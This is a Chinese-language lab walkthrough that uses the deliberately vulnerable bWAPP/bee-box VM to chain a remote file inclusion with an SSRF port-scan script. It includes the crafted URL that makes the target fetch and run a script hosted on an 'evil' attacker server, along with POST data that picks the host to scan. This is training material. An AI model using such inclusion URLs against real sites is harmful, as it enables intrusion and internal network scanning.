一、软件硬件平台
- 操作系统:windows 7、windows 2003、bee-box v1.6、windows 10
- 硬件平台:12g内存
- 软件:Firefox、xampp、hackbar、vmware workstations
二、端口扫描
- 安装bee-box
Bee系统是一个Ubuntu系统,但是对命令行界面的操作不多,不需要过多的配置,使用web进行远程操作所以使用起来是相当方便的。使用vmware安装bee后可以看到这样的界面。
2.使用web连接bee
因为是Ubuntu系统,所以直接使用命令行界面查看ip地址。这里的地址是:192.168.216.136,用Firefox浏览器登陆bee时点击bwapp后需要输入用户和密码才能继续进行本次实验。
3.选择SSRF
找到Server Side Request Forgery(SSRF),点进去后点击第一个选项拿到SSRF攻击脚本。把脚本用TXT保存起来并命名为ssrf-1.txt
4.存放攻击脚本
开启作为攻击的服务器,也就是win2003:192.168.216.127,在根目录上新建文件夹evil,并且把ssrf-1.txt放在evil里面,形成URL:192.168.216.127\evil\ssrf.txt
5.开启被攻击的服务器
本次实验是端口扫描,所以只要保证被攻击的服务器是开启的状态的可以了,并不需要对其进行访问。实验用机的地址为:192.168.216.128。
6.选择RFI LFI
回到浏览器下的bee页面,在右上选择Remote & Local File Inclusion (RFI/LFI),可以看到一个选择语言的的选项,默认英语直接点击go,生成了一条URL:http://192.168.216.136/bWAPP/rlfi.php?language=lang_en.php&action=go
7.打开hackbar
打开Firefox的hackbar工具,把上面获取的URL中的lang_en.php替换成http://192.168.216.127/evil/ssrf.txt,也就是:http://192.168.216.136/bWAPP/rlfi.php?language=http://192.168.216.127/evil/ssrf-1.txt&action=go,让网站直接读取脚本文件。勾选post data后在下面的文本框里输入:ip=192.168.216.128,指定端口扫描的服务器地址。
8.进行端口扫描
点击左边的Execute提交数据,可以看到端口扫描的结果是80和3306端口是开放的。
到192.168.216.128查看开放的端口,发现确实是80和3306端口
9.测试
这个时候我们关闭被攻击服务器的80端口,回到hackbar重新提交数据,可以看到端口扫描的结果只有一个3306端口。